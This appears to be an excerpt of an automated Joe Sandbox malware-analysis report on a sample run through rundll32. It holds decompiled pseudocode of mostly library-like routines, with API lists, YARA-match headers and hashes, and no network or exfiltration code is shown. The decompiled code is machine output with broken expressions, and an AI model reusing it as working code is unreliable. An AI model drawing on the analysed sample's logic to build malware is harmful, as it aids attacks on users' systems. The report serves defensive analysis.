                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoadlstrcpy
                • String ID:
                • API String ID: 304781146-0
                • Opcode ID: 0b49b04e65a30058fd5e78ef5794c424901968a41597d9151369477728d1a296
                • Instruction ID: 29f5666cd142d8905af5fa604c23394da4f11607ff3ef78a57d109c53222d6aa
                • Opcode Fuzzy Hash: 0b49b04e65a30058fd5e78ef5794c424901968a41597d9151369477728d1a296
                • Instruction Fuzzy Hash: 08110A37316E90C5FB319B11E8183D963A0FBECB94F9841659E8D46759EF3CC6058700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00000215215205C7480(long long __rax, long long __rbx, void* __rcx, long long _a8) {
                				long long _v24;
                				long long _v32;
                				short _v48;
                				long long _v56;
                				void* __rdi;
                				long long _t32;
                				long long _t41;
                				void* _t42;
                
                				_t33 = __rbx;
                				_t32 = __rax;
                				_v56 = 0xfffffffe;
                				_a8 = __rbx;
                				E00000215215205C7DF0(__rbx,  &_v48, __rcx, _t42);
                				_t46 =  >=  ? _v48 :  &_v48;
                				r8d = 0;
                				CreateEventW(??, ??, ??, ??);
                				 *0x206832c8 = _t32;
                				if (_t32 != 0) goto 0x205c74d8;
                				CloseHandle(??);
                				goto 0x205c74f9;
                				if (GetLastError() != 0xb7) goto 0x205c74fd;
                				CloseHandle(??);
                				 *0x206832c8 = _t41;
                				goto 0x205c74ff;
                				if (_v24 - 8 < 0) goto 0x205c751c;
                				E0000021521520588F90(0, _t33, _v48, _t41, _t42, _v24 + 1,  >=  ? _v48 :  &_v48);
                				_v24 = 7;
                				_v32 = _t41;
                				_v48 = 0;
                				return 1;
                			}












                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$ByteCharCreateErrorEventLastMultiWide
                • String ID:
                • API String ID: 1795745598-0
                • Opcode ID: 2521f5d9875d8b3ca812b0e1521cec3c50f7b132ce4204d89253beb7a7715d21
                • Instruction ID: 48993337dda84f90fc24a7253381826df56ea69212cacc205a71f3e15d3d0135
                • Opcode Fuzzy Hash: 2521f5d9875d8b3ca812b0e1521cec3c50f7b132ce4204d89253beb7a7715d21
                • Instruction Fuzzy Hash: 03118233206E64C2EB348B21F49879A7761FFE4764F640355EEA906AECCF3DD5458A00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00007FFA7FFA535E8A30(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                				void* _t9;
                				void* _t10;
                				intOrPtr _t22;
                				intOrPtr _t24;
                				void* _t32;
                				void* _t33;
                
                				_t16 = __rax;
                				_a8 = __rbx;
                				GetLastError();
                				_t22 =  *0x53754160; // 0xffffffff
                				if (_t22 == 0xffffffff) goto 0x535e8a5a;
                				E00007FFA7FFA535EDA58(_t10, _t22 - 0xffffffff, __rax, __rax, _t22);
                				if (__rax != 0) goto 0x535e8a9b;
                				asm("inc edi");
                				asm("invalid");
                				_t32 = __rax;
                				if (__rax != 0) goto 0x535e8a7a;
                				E00007FFA7FFA535E7E58(__rax, 0);
                				goto 0x535e8ab6;
                				_t24 =  *0x53754160; // 0xffffffff
                				E00007FFA7FFA535EDAB0(_t10, __rax, __rax, __rax, _t24, __rax, _t33);
                				if (__rax == 0) goto 0x535e8a73;
                				E00007FFA7FFA535E879C(__rax, __rax);
                				_t9 = E00007FFA7FFA535E7E58(_t16, 0);
                				if (_t32 == 0) goto 0x535e8ab6;
                				SetLastError(??);
                				return _t9;
                			}

                APIs
                • GetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8A3A
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AA2
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AB8
                • abort.LIBCMT ref: 00007FFA535E8ABE
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLast$abort
                • String ID:
                • API String ID: 1447195878-0
                • Opcode ID: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction ID: 41d6bc8505a41966eb2bf847cbed8b94652b182d55b5b757ed1cf7b8d335e363
                • Opcode Fuzzy Hash: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction Fuzzy Hash: EE018C21F39F464EFA59A731A55513D119B5FC6BA0F0CE478ED2E227D2ED2CF8456200
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E000002152152060C334(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                				void* _t4;
                				void* _t9;
                				intOrPtr _t11;
                				intOrPtr _t14;
                				void* _t23;
                				void* _t29;
                				void* _t32;
                				void* _t33;
                
                				_t29 = __rdx;
                				_t27 = __rcx;
                				_t25 = __rbx;
                				_t23 = __rax;
                				_a8 = __rbx;
                				GetLastError();
                				_t11 =  *0x2067c964; // 0xffffffff
                				if (_t11 == 0xffffffff) goto 0x2060c35e;
                				_t4 = E000002152152060C9F4(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                				if (__rax != 0) goto 0x2060c39f;
                				E0000021521520607C38(_t4, _t27, _t29);
                				_t32 = _t23;
                				if (_t23 != 0) goto 0x2060c37e;
                				E000002152152060A780(_t23, _t27);
                				goto 0x2060c3ba;
                				_t14 =  *0x2067c964; // 0xffffffff
                				if (E000002152152060CA4C(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x2060c377;
                				E000002152152060C0A0(_t32, _t23);
                				_t9 = E000002152152060A780(_t23, _t32);
                				if (_t32 == 0) goto 0x2060c3ba;
                				SetLastError(??);
                				return _t9;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$abort
                • String ID:
                • API String ID: 1447195878-0
                • Opcode ID: 4db4a9de8d0ce589456f7ba887c1b0012caff3b3272c8948a9a49da0a163a458
                • Instruction ID: edc9813b875c49398ed102ee336c8417a683edd8f99005704735c1e67c69e396
                • Opcode Fuzzy Hash: 4db4a9de8d0ce589456f7ba887c1b0012caff3b3272c8948a9a49da0a163a458
                • Instruction Fuzzy Hash: 06018032383F20C6FA786370551D3EE1293AFE47A0F3485A89D1A027DEED38A4494200
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000215215205BC1D0(intOrPtr __rax, long long __rcx, void* __rdx, void* __r8, char _a8) {
                				long long _v24;
                				void* __rbx;
                				intOrPtr _t9;
                				intOrPtr _t20;
                				void* _t35;
                				intOrPtr _t40;
                				intOrPtr _t41;
                
                				_t20 = __rax;
                				_a8 = __rcx;
                				_v24 = 0xfffffffe;
                				E00000215215205D6EBC(__rax,  *((intOrPtr*)(__rdx + 8)));
                				 *0x206874b0 = __rax;
                				if (__r8 == 0) goto 0x205bc281;
                				_t40 =  *0x20681950; // 0x0
                				if (_t40 != 0) goto 0x205bc251;
                				E00000215215205D19DC(0,  &_a8);
                				if ( *0x20681950 != 0) goto 0x205bc239;
                				_t9 =  *0x20681908; // 0x0
                				 *0x20681908 = _t9 + 1;
                				 *0x20681950 = _t20;
                				E00000215215205D1A5C(_t20,  &_a8);
                				_t41 =  *0x20681950; // 0x0
                				E00000215215205D48B8(__r8,  *0x206874b0, __r8, _t35, _t41);
                				 *((intOrPtr*)( *0x206874b0 + 0x20)) = 0;
                				return E00000215215205BB6E0( *0x206874b0, __r8,  *0x206874b0 + 0x28, "*", _t35);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Locimp::_std::locale::_$LocimpLockitstd::_$AddfacLocimp_Lockit::_Lockit::~_New_
                • String ID:
                • API String ID: 689645054-0
                • Opcode ID: 085596bfa8605262658fc5387fc4355da982d6cc03ef23043d0f51ddc70501df
                • Instruction ID: 07e7fffff662a0a6164c0633671077ee562131991ba858290093bd8f77e5fedf
                • Opcode Fuzzy Hash: 085596bfa8605262658fc5387fc4355da982d6cc03ef23043d0f51ddc70501df
                • Instruction Fuzzy Hash: B8118C77603E60C5EA20DB40E8583D567A4FFE5791F240296DD691B2AECF3CE84A8300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0000021521520589340(void* __rdx) {
                
                				if (__rdx != 0) goto 0x20589352;
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d92ff5e3a58a994a48adb4bec682cc1832eddf598bbbd8a3fc4526484e0e43a
                • Instruction ID: 547c777db776f92d2de2828a2fb85c797e8ad3c44ac616bc21c9f06db3ac111f
                • Opcode Fuzzy Hash: 8d92ff5e3a58a994a48adb4bec682cc1832eddf598bbbd8a3fc4526484e0e43a
                • Instruction Fuzzy Hash: D4F03072703D12D2ED18F355845E3EC21906BE97B4FD40BA4AF3E463C9EE6C85964300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000215215205BBE70(void* __rdx) {
                
                				if (__rdx != 0) goto 0x205bbe82;
                				return 0;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction ID: ad07df5f6d6978b9d1854444b59d6cad811cc0be1c479762dc5fdabe08be51d1
                • Opcode Fuzzy Hash: 39e2ae9d972135b19e8721c0c272893ea021ef14bacb15c7e938a42317222523
                • Instruction Fuzzy Hash: 7AF03AB2B03D15D5FD1CB351849E3EC11A2AFAA7F0F9047A49B3E457DEADEC90914600
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E000002152152060D440(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
                				void* _v24;
                				intOrPtr _v32;
                				intOrPtr _v48;
                				intOrPtr _v56;
                				long long _v72;
                				intOrPtr _v80;
                				intOrPtr _v88;
                				intOrPtr _v96;
                				long long _v104;
                				void* _t62;
                				void* _t65;
                				void* _t69;
                				char _t70;
                				char _t73;
                				signed char _t75;
                				void* _t86;
                				intOrPtr _t87;
                				void* _t88;
                				signed int _t96;
                				void* _t124;
                				intOrPtr* _t139;
                				char* _t143;
                				long long _t171;
                				signed long long _t174;
                				intOrPtr* _t178;
                				char* _t179;
                				signed long long _t184;
                				void* _t185;
                				signed long long _t192;
                				signed long long _t194;
                				signed long long _t197;
                				signed long long _t201;
                				intOrPtr* _t202;
                				char* _t203;
                				intOrPtr* _t204;
                				char* _t205;
                				void* _t206;
                				char* _t208;
                				void* _t209;
                				char* _t210;
                				char* _t211;
                				char* _t212;
                				char* _t213;
                				unsigned int* _t216;
                				void* _t219;
                				intOrPtr* _t221;
                				char* _t227;
                				long long _t235;
                				intOrPtr* _t239;
                				char* _t241;
                
                				_t171 = __rbx;
                				_t139 = _t221;
                				 *((long long*)(_t139 + 8)) = __rbx;
                				 *((long long*)(_t139 + 0x10)) = __rbp;
                				 *((long long*)(_t139 + 0x18)) = __rsi;
                				 *((long long*)(_t139 + 0x20)) = __rdi;
                				_push(_t235);
                				r12d = 0;
                				_t201 = __rdx;
                				 *((intOrPtr*)(__rdx)) = r12b;
                				_t216 = __rcx;
                				_t174 = _t139 - 0x38;
                				_t219 = __r8;
                				_t86 =  <  ? r12d : _a48;
                				E00000215215205FA5D4(_t139, __rbx, _t174, _a72);
                				if (__r8 - _t171 + 0xb > 0) goto 0x2060d4ae;
                				_t62 = E0000021521520603944(_t139);
                				_t9 = _t235 + 0x22; // 0x22
                				_t87 = _t9;
                				 *_t139 = _t87;
                				E00000215215205FAABC(_t62);
                				goto 0x2060d769;
                				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0x2060d539;
                				_v72 = _t235;
                				_v80 = _a64;
                				_t192 = _t201;
                				_t143 = _a40;
                				_v88 = r12b;
                				_v96 = _t87;
                				_v104 = _t143;
                				_t65 = E000002152152060D7A0(_t171, __rcx, _t192, __rcx, __r8);
                				_t88 = _t65;
                				if (_t65 == 0) goto 0x2060d507;
                				 *_t201 = r12b;
                				goto 0x2060d769;
                				strrchr(_t241);
                				if (_t143 == 0) goto 0x2060d766;
                				asm("sbb dl, dl");
                				 *_t143 = 0xd0;
                				 *((intOrPtr*)(_t143 + 3)) = r12b;
                				goto 0x2060d766;
                				if (( *_t216 & 0x00000000) == 0) goto 0x2060d54e;
                				 *_t201 = 0x2d;
                				_t202 = _t201 + 1;
                				r15b = _a56;
                				r10d = 0x30;
                				asm("sbb edx, edx");
                				if (( *_t216 & 0x00000000) != 0) goto 0x2060d5a1;
                				 *_t202 = r10b;
                				_t203 = _t202 + 1;
                				asm("dec eax");
                				goto 0x2060d5a7;
                				 *_t203 = 0x31;
                				_t204 = _t203 + 1;
                				_t239 = _t204;
                				_t205 = _t204 + 1;
                				if (_t88 != 0) goto 0x2060d5b6;
                				 *_t239 = r12b;
                				goto 0x2060d5ca;
                				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
                				if (( *_t216 & 0xffffffff) <= 0) goto 0x2060d65d;
                				r8d = r10w & 0xffffffff;
                				if (_t88 <= 0) goto 0x2060d613;
                				_t69 =  ~r15b + r10w;
                				_t124 = _t69 - 0x39;
                				if (_t124 <= 0) goto 0x2060d601;
                				_t70 = _t69 + 0xffffffff000000e7;
                				 *_t205 = _t70;
                				_t206 = _t205 + 1;
                				r8w = r8w + 0xfffc;
                				if (_t124 >= 0) goto 0x2060d5e1;
                				if (r8w < 0) goto 0x2060d65d;
                				_t96 = r8b;
                				if (_t70 - 8 <= 0) goto 0x2060d65d;
                				_t28 = _t206 - 1; // 0x2
                				_t178 = _t28;
                				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0x2060d642;
                				 *_t178 = r10b;
                				_t179 = _t178 - 1;
                				goto 0x2060d632;
                				if (_t179 == _t239) goto 0x2060d65a;
                				_t73 =  *_t179;
                				if (_t73 != 0x39) goto 0x2060d654;
                				 *_t179 = 0xffffffff00000121;
                				goto 0x2060d65d;
                				 *_t179 = _t73 + 1;
                				goto 0x2060d65d;
                				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
                				if (_t88 - 1 <= 0) goto 0x2060d678;
                				_t75 = E00000215215205F8EF0(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
                				r10d = 0x30;
                				_t208 =  ==  ? _t239 : _t206 + _t171;
                				r15b =  ~r15b;
                				asm("sbb al, al");
                				 *_t208 = (_t75 & 0x000000e0) + 0x70;
                				if ( *_t239 - r12b < 0) goto 0x2060d6a6;
                				 *((char*)(_t208 + 1)) = 0x2b;
                				_t209 = _t208 + 2;
                				goto 0x2060d6b1;
                				 *((char*)(_t209 + 1)) = 0x2d;
                				_t210 = _t209 + 2;
                				_t184 =  ~(( *_t216 >> 0x34) - _t219);
                				 *_t210 = r10b;
                				_t227 = _t210;
                				if (_t184 - 0x3e8 < 0) goto 0x2060d6f3;
                				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
                				 *_t210 = __r10 + _t194;
                				_t211 = _t210 + 1;
                				_t185 = _t184 + _t194 * 0xfffffc18;
                				if (_t211 != _t227) goto 0x2060d6f9;
                				if (_t185 - 0x64 < 0) goto 0x2060d727;
                				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
                				 *_t211 = __r10 + _t197;
                				_t212 = _t211 + 1;
                				if (_t212 != _t227) goto 0x2060d732;
                				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0x2060d75d;
                				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
                				_t213 = _t212 + 1;
                				 *_t213 = (_t96 & 0x000007ff) + r10b;
                				 *((intOrPtr*)(_t213 + 1)) = r12b;
                				if (_v32 == r12b) goto 0x2060d77c;
                				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
                				return r12d;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: gfffffff
                • API String ID: 3215553584-1523873471
                • Opcode ID: e0f4c73f1cf080fd4f32a0d3782735035009ff0944299297ae4a53c528665ff5
                • Instruction ID: 42988468a4fef2cfa2dd9988f06436a6c935d78be6d90d1fec46930916802181
                • Opcode Fuzzy Hash: e0f4c73f1cf080fd4f32a0d3782735035009ff0944299297ae4a53c528665ff5
                • Instruction Fuzzy Hash: DF916A73756BD4C6EB218F2991483DE6B56FBB5BD0F248261CF890739AD63AE101C301
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00000215215205FC128(void* __edx, signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                				void* _t89;
                				signed int _t99;
                				unsigned int _t107;
                				signed int _t114;
                				signed int _t116;
                				signed int _t118;
                				signed int _t123;
                				signed int _t125;
                				unsigned int _t132;
                				intOrPtr* _t150;
                				intOrPtr _t165;
                				long long _t170;
                				signed int _t172;
                				intOrPtr* _t176;
                				void* _t179;
                
                				_t174 = __rbp;
                				_t172 = __rsi;
                				_t170 = __rdi;
                				_t150 = _t176;
                				 *((long long*)(_t150 + 8)) = __rbx;
                				 *((long long*)(_t150 + 0x10)) = __rbp;
                				 *((long long*)(_t150 + 0x18)) = __rsi;
                				 *((long long*)(_t150 + 0x20)) = __rdi;
                				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x205fc167;
                				_t89 = E0000021521520603944(_t150);
                				 *_t150 = 0x16;
                				E00000215215205FAABC(_t89);
                				goto 0x205fc37f;
                				if ( *(__rcx + 0x18) == __rsi) goto 0x205fc14f;
                				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x205fc37c;
                				_t123 = __edi | 0xffffffff;
                				_t10 = _t170 + 0x21; // 0x121
                				_t125 = _t10;
                				 *((intOrPtr*)(__rcx + 0x50)) = 0;
                				 *(__rcx + 0x2c) = 0;
                				goto 0x205fc345;
                				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
                				if ( *(__rcx + 0x28) < 0) goto 0x205fc35e;
                				if (( *(__rcx + 0x42) & 0x0000ffff) - _t125 - 0x5a > 0) goto 0x205fc1c5;
                				goto 0x205fc1c7;
                				_t107 = ( *(__rcx + 0x206302b0) & 0x000000ff) >> 4;
                				 *(__rcx + 0x2c) = _t107;
                				if (_t107 == 8) goto 0x205fc39a;
                				_t132 = _t107;
                				if (_t132 == 0) goto 0x205fc2f0;
                				if (_t132 == 0) goto 0x205fc2dc;
                				if (_t132 == 0) goto 0x205fc29c;
                				if (_t132 == 0) goto 0x205fc26a;
                				if (_t132 == 0) goto 0x205fc262;
                				if (_t132 == 0) goto 0x205fc231;
                				if (_t132 == 0) goto 0x205fc224;
                				if (_t107 - 0xfffffffffffffffc != 1) goto 0x205fc3aa;
                				E00000215215205FCF54(__rcx, __rcx, __rsi, __rbp, _t179);
                				goto 0x205fc341;
                				E00000215215205FC8B8( *(__rcx + 0x2c), _t150, __rcx);
                				goto 0x205fc341;
                				if ( *(__rcx + 0x42) == 0x2a) goto 0x205fc249;
                				E00000215215205FBA80(__rcx, __rcx, __rcx + 0x38, _t172, _t174);
                				goto 0x205fc341;
                				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
                				_t114 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
                				_t115 =  <  ? _t123 : _t114;
                				 *(__rcx + 0x38) =  <  ? _t123 : _t114;
                				goto 0x205fc33f;
                				 *(__rcx + 0x38) = 0;
                				goto 0x205fc345;
                				if ( *(__rcx + 0x42) == 0x2a) goto 0x205fc277;
                				goto 0x205fc23c;
                				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
                				_t116 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
                				 *(__rcx + 0x34) = _t116;
                				if (_t116 >= 0) goto 0x205fc33f;
                				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
                				 *(__rcx + 0x34) =  ~_t116;
                				goto 0x205fc33f;
                				_t99 =  *(__rcx + 0x42) & 0x0000ffff;
                				if (_t99 == _t125) goto 0x205fc2d6;
                				if (_t99 == 0x23) goto 0x205fc2d1;
                				if (_t99 == 0x2b) goto 0x205fc2cb;
                				if (_t99 == 0x2d) goto 0x205fc2c5;
                				if (_t99 != 0x30) goto 0x205fc345;
                				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
                				goto 0x205fc345;
                				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
                				goto 0x205fc345;
                				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
                				goto 0x205fc345;
                				 *(__rcx + 0x30) =  *(__rcx + 0x30) | _t125;
                				goto 0x205fc345;
                				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
                				goto 0x205fc345;
                				 *(__rcx + 0x30) = _t172;
                				 *((intOrPtr*)(__rcx + 0x40)) = sil;
                				 *(__rcx + 0x38) = _t123;
                				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
                				 *((intOrPtr*)(__rcx + 0x54)) = sil;
                				goto 0x205fc345;
                				 *((char*)(__rcx + 0x54)) = 1;
                				_t165 =  *((intOrPtr*)(__rcx + 0x468));
                				if ( *((intOrPtr*)(_t165 + 0x10)) !=  *((intOrPtr*)(_t165 + 8))) goto 0x205fc319;
                				if ( *((intOrPtr*)(_t165 + 0x18)) == sil) goto 0x205fc314;
                				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
                				goto 0x205fc33f;
                				 *(__rcx + 0x28) = _t123;
                				goto 0x205fc33f;
                				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
                				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) + 1;
                				 *((short*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)))))) =  *(__rcx + 0x42) & 0x0000ffff;
                				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) + 2;
                				if (1 == 0) goto 0x205fc3aa;
                				_t118 =  *( *(__rcx + 0x18)) & 0x0000ffff;
                				 *(__rcx + 0x42) = _t118;
                				if (_t118 != 0) goto 0x205fc198;
                				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
                				if ( *(__rcx + 0x2c) == 0) goto 0x205fc369;
                				if ( *(__rcx + 0x2c) != 7) goto 0x205fc39a;
                				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x470)) != 2) goto 0x205fc18d;
                				return  *(__rcx + 0x28);
                			}



















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: *
                • API String ID: 3215553584-163128923
                • Opcode ID: ddef714bbed3b668a8c1992db142bc22af8731cb911405b7755d3538c847e4f3
                • Instruction ID: 73701b017c1bb8fb93b7de69eec68e59e6eaf35ce8a854fd5b84126a25ed3ddd
                • Opcode Fuzzy Hash: ddef714bbed3b668a8c1992db142bc22af8731cb911405b7755d3538c847e4f3
                • Instruction Fuzzy Hash: 11818577606A30C6E7688F29825C2AC3FB0FBAAF98F2455A9DF46422DCD739C441D740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000215215205FBF24(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16) {
                				void* _t73;
                				unsigned int _t80;
                				intOrPtr _t91;
                				signed int _t97;
                				signed int _t99;
                				char _t101;
                				signed int _t105;
                				unsigned int _t113;
                				void* _t133;
                				void* _t143;
                
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_t133 = __rcx;
                				if ( *((long long*)(__rcx + 0x468)) != 0) goto 0x205fbf58;
                				_t73 = E0000021521520603944(__rax);
                				 *__rax = 0x16;
                				E00000215215205FAABC(_t73);
                				goto 0x205fc102;
                				if ( *((long long*)(__rcx + 0x18)) == 0) goto 0x205fbf40;
                				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x205fc0ff;
                				_t105 = __edi | 0xffffffff;
                				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
                				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
                				goto 0x205fc0d7;
                				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x205fc0ec;
                				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x205fbfb2;
                				_t128 =  *((char*)(__rcx + 0x41));
                				goto 0x205fbfb4;
                				_t80 = ( *( *((char*)(__rcx + 0x41)) + 0x20630250) & 0x000000ff) >> 4;
                				 *(__rcx + 0x2c) = _t80;
                				if (_t80 == 8) goto 0x205fc112;
                				_t113 = _t80;
                				if (_t113 == 0) goto 0x205fc0cb;
                				if (_t113 == 0) goto 0x205fc0b2;
                				if (_t113 == 0) goto 0x205fc07d;
                				if (_t113 == 0) goto 0x205fc051;
                				if (_t113 == 0) goto 0x205fc048;
                				if (_t113 == 0) goto 0x205fc01b;
                				if (_t113 == 0) goto 0x205fc00e;
                				if (_t80 - 0xfffffffffffffffc != 1) goto 0x205fc122;
                				E00000215215205FCCD8( *((char*)(__rcx + 0x41)), __rcx, __rcx, _t143, 0x20630250);
                				goto 0x205fc0d3;
                				E00000215215205FC73C(_t128, _t133);
                				goto 0x205fc0d3;
                				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x205fc032;
                				E00000215215205FB9FC(_t133, _t133, _t133 + 0x38);
                				goto 0x205fc0d3;
                				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
                				_t97 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
                				_t98 =  <  ? _t105 : _t97;
                				 *(_t133 + 0x38) =  <  ? _t105 : _t97;
                				goto 0x205fc079;
                				 *(_t133 + 0x38) =  *(_t133 + 0x38) & 0x00000000;
                				goto 0x205fc0d7;
                				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x205fc05d;
                				goto 0x205fc025;
